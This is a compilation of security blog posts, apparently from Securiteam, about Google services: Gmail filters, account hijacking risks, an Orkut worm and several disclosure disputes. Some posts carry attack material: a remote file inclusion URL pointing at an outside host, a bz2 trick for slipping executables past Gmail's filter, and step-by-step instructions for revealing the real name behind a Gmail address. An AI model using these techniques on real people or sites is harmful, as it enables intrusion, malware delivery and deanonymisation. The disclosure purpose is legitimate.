I have just Googled up some Securiteam pages. Can you imagine my shock when I saw the Google Alert Saying Securiteam can harm my computer?

Isn’t that great?

Just before I push the Panic Button, I Googled up one more term.

This is what I got:

When I saw this one, I relaxed.

On regular days when you see the message saying “This site may harm your computer” it means that google believes that this site may install malicious software on your computer.
Today Google’s Safe Browsing feature probably freaked out for some reason.

In any case, according to Google, the whole Internet can harm your computer right now, so be careful!

Update: Marissa Mayer wrote in the google blog that the problem happened because the URL of ‘/’ was mistakenly added to the ‘bad sites’ file and ‘/’ expands to all URLs. She also wrote that this problem started at  6:27 a.m. and ended at 7:25 a.m. PST.

I ran across something interesting today. A friend asked me to send him a certain exe to his email. Not thinking much about it, I composed an email on my gmail, attached the exe, hit send and then seen an error in which basically told me google doesn’t allow exes to be sent through gmail.

Irritating enough, but seemingly familiar, I decided to ‘get smart’ and zip the exe in a folder and send it. Same thing.

!@#$%

I also tried gzipping the archive and sending it.. didn’t work either.

I finally compressed the folder+exe to make a bz2 archive and sent it away. Worked like a charm.

Where was Google attachment filters then!? *grin*

Yes snooping on someone else’s GoogleTalk is no big deal if you know their password, but what is interesting that unlike other chat clients like Skype, MSN and others GoogleTalk will allow you to do so simultaneously.

You can connect to the GoogleTalk server while another user using the same username and password is also connected to the GoogleTalk server.

This neat feature, probably stems from the fact that Google supports web based chat in a constantly refreshing web page (unlike MSN which launches a separate window) allows you to see incoming responses and messages being sent to your target without needing to do anything.

BTW Google, don’t fix this, I find it useful for my BlackBerry and PC chat sharing - basically never needing to logon/logoff on my PC/BlackBerry they are both constantly connected to the Google Talk servers.

UPDATE This post is not related to the recently released NSA patent on Snoop detection

Google has garnered a lot of interest, over the past day or two, with its radically new idea, released under the name Native Client.  You can read the announcement at http://google-code-updates.blogspot.com/2008/12/native-client-technology-for-running.html or download the research paper (in PDF) at http://nativeclient.googlecode.com/svn/trunk/nacl/googleclient/native_client/documentation/nacl_paper.pdf
That idea sounded so familiar I just knew it had to have been done before.

It has.  It’s just a dressed up version of an activity monitor.  The oldest form of AV actually implemented.  In fact, it dates back to the days just slightly before the first PC viruses, when people were trying to prevent damage by some of the early PC trojans that were being shared on BBSes.

Or, if they take it far enough, and if you like, you can call it a form of virtual machine.  And we are back to http://blogs.securiteam.com/index.php/archives/1171

Net Applications reported this week that one third of the traffic coming from Google’s facilities has no user agent. This report refers specifically to the traffic coming from Google’s employees and not the Search Engine’s traffic.
Vince Vizzaccaro, a senior executive from Net Applications said that they had never seen an OS stripped off the user agent string before. “you have to arrange to have that happen, it’s not something we’ve seen before with a proxy server.”
So what’s Google hiding? Of course, Google, like Google wouldn’t comment on rumors and speculations.

What do you think? Why would they hide their UA?

You are probably reading this post, asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him, it’s completely unrelated.

It has to do with this site: http://babycaleb.fort unecity.co.uk/ (I broke the link so people do not JUST jump and go to it)

This site isn’t mine, it was used to hack a friend’s web site, so I took to myself to look into it.

This site hosts a few pictures, some are quite weird to put online (hint to: My Wifes Scar), while others are completely harmless (hint to: My baby).

The issue is not in the pictures but rather what is there and cannot be seen without doing a bit of digging.

I will give some more hints in a follow-up post, if no one else comes up with what does this site do to you.

(Another hint, the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu necity.co.uk/index.htm)

Calcalist reports that the wired network in a recent google developers conference in Israel was hacked during the conference. I haven’t seen that report anywhere else, but the reporter Dora Kishinevski is fairly level headed with little tendency for sensational stories so I’m marking it as probably true.

According to the article, google sent a follow up email to the participants and warned them the network was compromised. This is interesting first because the attack was on the wired and not wireless Internet, which is considerably harder to do without being caught, and second because it reminds us how insecure gmail is over compromised lines (as opposed to, for example, a corporate VPN). I’m willing to bet close to 100% of the participants used gmail while in the google conference.

The article also quotes google as writing “We recommend you change your password, just in case, to any site you visited using the wired connection”. Definitely.

SearchEngineJournal has a story about this guy that gave the keys to his business to Google. Well, not exactly the keys, but he used a Gmail account for all his business emails, and had used the same account for his Google Analytics, Webmaster Tools and his own Google Adsense account.
And then one day he woke up and found out that Google disabled his Google account.

From that moment on, not only his Adsense income stopped and he couldn’t access any email he kept in his Gmail Inbox, but all the emails sent to him by his customers were routed to a voided account.
I can’t even think how to start handling such a crisis. What do you do first? I have a few ideas but that’s for a different post.

What the hell was he thinking about when he gave Google the keys to his business?

If you still want to use a Google account for your business there are a few things you should do:
1. Make sure you backup your account on a regular basis.

2. Get your own domain and use Google Apps. This way in case of emergency you can change your MX Records back you to your original hosting whitin a few hours.

3. Never use your personal account for your Google Adwords.

4. Never use your personal account for your Google Analytics.

5. Never Ever use your personal account for your Google Adsense.

Don’t let them catch you unprepared.

Here’s what happens when you try to bury a security vulnerability by fixing it silently and not telling anyone: all other similar vulnerabilities remain unfixed.

When I started a challenge yesterday to find a different way to find the full name behind a user’s gmail address I had a specific method in mind – a weakness in google docs that shows the full name of a person when you share a document (description and screen shots below). But it appears this problem is more widespread – it affects google maps, and perhaps other apps as well (there seems to be a difference between various localized versions of the google applications, so YMMV). Andre claims that he’d known about this for 2.5 years ago, and I wonder who else have known (spammers using this method to personalize the mails sent to gmail addresses?). All of this could have been prevented if google came out with a simple advisory explaining the problem and their stand on it. If they really wanted to fix it (and not just silence the press about the previous problem) people would have notified them about the other problems so that they can address them. Instead, they sent a PR drone to deny this is really a problem, while a programmer patched it without giving thought to the other google applications.

I’d be happy to hear from anyone on google’s security or development team – I promise to post their response verbatim and I’m curious to hear what they have to say. Notice, however, that I couldn’t care less about their PR response. If your position in google is marketing, don’t bother replying – this is a security issue and not a marketing issue – it’s time google addresses it for what it is.

And for those who were patient enough to go through my rant, here’s a step-by-step explanation provided by Vincent Claeys on how to reveal the real name behind the gmail address. Kudos to Naftali Shpitzer, Vincent Claeys and Andre Gironda for finding the way (and other ways I haven’t thought of…) to solve the problem.

1. Log in to your gmail account
2. Click documents on the left top
3. Create a presentation, save it, close it
4. In the list with presentations, select the presentation you just made
5. Click the “share” button
6. Type in the e-mail address of which you want to find out the real name
7. Click “invite” (I always use “as viewers”, but “as collaborators”
will work as well I guess)

8. Click “skip sending invitation”

9. Click “ok” in the warning window
10. Click on the presentation to open it (a new window will open)
11. Click on the “share” tab on the right top corner
12. Read the real name of the person you invited

13. Remove the invited person from the list again so he doesn’t notice
anything when he logs into his gmail account

As you can see from the comments in my previous post, google has fixed the google calendar problem that allowed gmail users to see other users’ full names. Obviously, many people are disappointed – that’s the downside of web services: once a vulnerability is fixed, it’s fixed for everyone, immediately

But Yair, SEO expert by day and curious individual by night, told me about a different way to do the attack. This attack works on both gmail and google app users, and is completely stealth – unlike the google calendar attack that notifies the victim, this one can be conducted without them knowing.

So what should I do with this information? Contacting the google security team is like typing Shakespeare into /dev/null, as anyone who ever tried to report a security vulnerability to google probably knows – it’s amazing to see the difference between the hostile google security team and the Microsoft security team who is trying hard (sometimes a little too hard) to be researcher friendly. So contacting google security is pretty much not an option.

The other ‘default’ option is to go full disclosure. But in this case, disclosing a bug in google will result in them claiming the bug is actually a feature, and then fixing it silently without any acknowledgment while chanting softly: “There was no bug. These aren’t the droids you’re looking for. Move along”. None of you will get a chance to test it, because by the time you do the problem would be fixed and we have never been at war with Eurasia.

So how do I give the smart readers a chance to try it out without alerting the world media? Simple: I will give you a chance to try it out before I disclose it. A smart and energetic researcher should be able to find this bug based on the hints in this page. You might even find holes different then what Yair did. This should be fun…

To give the proper incentive, if you find the hole, try to get the full name of the gmail email metalolcats@gmail.com. Use the full name as a coupon code to get a free account on our vulnerability scanning service to scan your server from the Internet on an ongoing basis. Just sign up here and use the real name of the gmail user above as the coupon code.  If you don’t have a server to scan for vulnerabilities or don’t feel like signing up, send me the answer to aviram at beyondsecurity.com and I will mention you on this page. But be quick, the google QA team may find it before you. When enough people find it, or google fixes it, I’ll publish the way along with some screenshots. That is, if the truth ministry doesn’t get to me first.

Oh, and the question you are all dying to ask – admin@gmail.com is no longer ’smart ass’. It’s now just boring old “Admin”, but then again it always has been.

A few weeks ago, Google added an option to force your Gmail connection to https instead of http. This feature was great news for people like me who use public networks a lot.
I was looking for that feature in my settings page but couldn’t find anything that looks like it. I stopped looking for it and today when looking for something else, I found the reason why I didn’t get this feature.
I’m using Google Apps for my domain, and apparently my Google Apps account simply doesn’t have this feature. Only my Gmail account has it!

This is how the setting page of my Gmail account looks like:

This is how my Google Apps setting page looks like:

I can’t think of a good reason for Google to make a Google Apps account less secure than a Gmail account. I can only hope that it’s a matter of time and it is not one of those features that will never be included in Google Apps.

In any case, if you are using Google Apps you can still use a secured connection.
Instead of going to http://mail.google.com/a/your-domain , take your browser to https://mail.google.com/a/your-domain.
That will make your connection https instead of http.

Google had supported https for Gmail from day 1. The thing is, it was kind of a secret and if you didn’t look for it, or didn’t have somebody to tell you about it, you would still be using http. As a matter of fact, I doubt it if more than a tiny fraction of Gmail users have ever heard of https and know if it’s good or bad.

Security should be built over security awareness. Without awareness real security will never happen. Employees who write classified documents should be aware of the document classification they work on. It is not enough to tell them that their document is classified. They need to know about classification and think about classification and understand what classification means when dealing with it.
The same way that people know not to keep their ATM card PIN code in their wallet, (the bank helped them to raise their security awareness) Google must help their users raise their security awareness and know not only that https is available for Gmail but also that https is so much safer than http and should be used by default.

I doubt it if the majority of people will ever use the secured connection for Gmail. Such a feature requires education and Google will never do that. Since https is significantly slower than http, and since most people don’t know about security and don’t really care about security, this feature is probably just another feature for the readers of this blog, and their family and friends.

Update: I checked gmail corporate user comment, and he is right. My gemstones shop uses the free version of Google Apps. The paid version has a feature called “SSL enforcement for secure HTTPS access” that is included in the paid version only (no.4 in “Collaboration application features”).To be honest, I don’t think I have the right to complain about something I got for free. I also have customers that are paying for premium features that cost me nothing, features that are there just to make the customers upgrade to the Advanced Plan. I guess this is not a mistake and someone wants me to upgrade. Fair enough.

How easy is it to break into your Gmail account? How about Yahoo! Or Windows Live?
If you provided a truthful answer to the security question during signup, it is probably quite easy to hijack your account, with just a little bit of a research.

Take a look at the Yahoo! Security Questions:

Are these security questions?

Anyone that knows my address can easily figure out the name of my first school or my high school mascot. All of my neighbors, family and friends know both my dog’s name and my dad’s middle name, and everybody in the world knows I just LOVE the Lakers. As for my wife and me, the people who attended our wedding had the chance to hear about it in the ceremony - in case you couldn’t make it, we met on a roof of a bus, in Ladakh, India in 1994…

The fact that the answer to each of the security questions above is relatively easy to find out, makes them a security vulnerability in my Yahoo! account.
By letting me make a security key based on the name of my first school, Yahoo! actually puts me at risk, allowing anyone that knows where I live to hijack my account. It’s like saying “We have the greatest lock to protect your house. Now, why don’t we hide the key under the mat”.

Windows Live is pretty much the same as Yahoo!:

Gmail is a little bit more sophisticated with one major difference:

Gmail is the only one of these three that allows you to choose your own question.
By letting you do that, Gmail asks “which question only you can answer?” I think that most people might still come up with “Who is my favorite singer”, “What is my date of birth” or “My dog’s name”.
However, that isn’t a security vulnerability encouraged by Google. If they give you the tools and you fail to use them, it’s not their fault.

So, what can we do about it?
If you can write your own question, that would be the best. If not, choose the question about the name of your first school and put your first phone number as the answer. That’s what I did!

Got better ideas? Share them with us!

Ever wondered what name is behind some obscure gmail address? Maybe your preferred gmail address was taken and you’re wondering who took it?
Here’s a cute vulnerability in the gmail system that comes from the strong tie-ins between gmail, the google calendar and all the other services.

How to do it:

- Go to the ’share this calendar’ tab

- Enter the email address in the ‘person’ box

- Click ‘add person’ and ’save’

- When you return to this screen you will see the first and last name along with the gmail address

Screenshots:

I always wondered who was behind admin@gmail.com

Oh, I guess they figured people like me would be interested…

If you are getting personalized emails from spammers to your gmail account, here’s an idea on how they got your name.

For those not familiar with RBL, the term means Real-time Blackhole List, it is mainly used for SPAM fighting. I have recently started playing around with Google as an RBL engine, the idea is that if the search term I use hits too many hits it is likely to be SPAM

The danger of course is that the term could be simply popular - but the trick here is that I’m using something very special as the search term - the IP address of the poster.

The IP address shouldn’t be popular; except for a few rare cases, IP addresses listed on Google are directly related to SPAM - either they are listed under wiki-like sites as being banned, or they appear as mass-comment posters. Simply put, if your IP is listed in Google you must be up to no good.

How good is this method? Nothing is bullet proof, but if you have a suspicion of something being SPAM, put the IP in Google and see there are hits; Almost all the comment SPAM I filtered out this month had more than 100 hits in Google, all non-SPAM had either 0 or below the 10 hits mark.

BTW: A good advantage of Google is that it is quick - a few seconds to get a respond - a disadvantage is that you cannot just “hammer” them with searches or they will block you - maybe someone can pickup this idea and make an RBL from IP addresses using Google as a back-engine.

Howdy ho from Brazil, folks.

Remember that vulnerability in Gmail filter feature reported by Petko D. Petkov in September? Google fixed this vulnerability a few days after it was disclosed, but something was missing: end users should be noticed about that.
Early this week I was made aware of someone who was hit hard by this vuln months after it was fixed. David Airey’s domain was hijacked and this vulnerability helped on that.

But Google fixed that, what’s the problem? They should have noticed all users about that. New filters could not be injected anymore after the fix, but filters injected before the fix were still there. A simple “please check you filters” Web two-dot-oh notice would be enough, only if new filters were added in the days between the vuln was disclosed and the fix. End users don’t read the same blogs, lists and security resources that we read. Users are not supposed to know the nuts and bolts of the vulnerability, but they should know what manual actions should be taken.
I don’t know about you, but I thought about some solutions for that:

1. Anything under settings should require password, in every change. I guess Yahoo! Mail works like that;
2. Filters that forward messages should be handled in a different way, maybe under “Forwarding and POP/IMAP” tab.

Another simple mitigation action that people should use for any online service is something like a privilege separation (I don’t have a better name for that). Use different accounts for different purposes, have a master account and child accounts that forward every message to the master account.

If you are a moderator in a Yahoo! Group don’t use your main personal profile for group management, for example. Reducing the lifetime of the session to 15 minutes and log in only on trustworthy networks are other paranoid measures that could be considered. If there’s a targeted attack against your account probably your less critical account will be affected.
Do you have any insight about this Gmail vuln? Comment.
More info:

• Google GMail E-mail Hijack Technique (GNUCITIZEN 09/25/07)
  
• New cracks in Google mail (The Register 09/26/07)
• Google Fixes Gmail Cross-site Request Forgery Vulnerability (Netcraft 09/30/07)
• WARNING: Google’s GMail security failure leaves my business sabotaged (David Airey Blog 12/24/07)

An Orkut based virus/worm appears to be on the loose, it propagates by posting notes on people’s scrapbook. So chances are that if you got a new scrapbook item on your long-unused Orkut it is because the worm has infected one of your friends there.

The virus/worm utilizes javascript code to propagate. The source of it can be found here: hxxp://files.myopera.com/virusdoorkut/files/virus.js
Update: Google apparently is actively deleting items from the scrapbook of people that were infected and that have infected others.

Update 2: More details can be found here: http://antrix.net/journal/techtalk/orkut_xss.html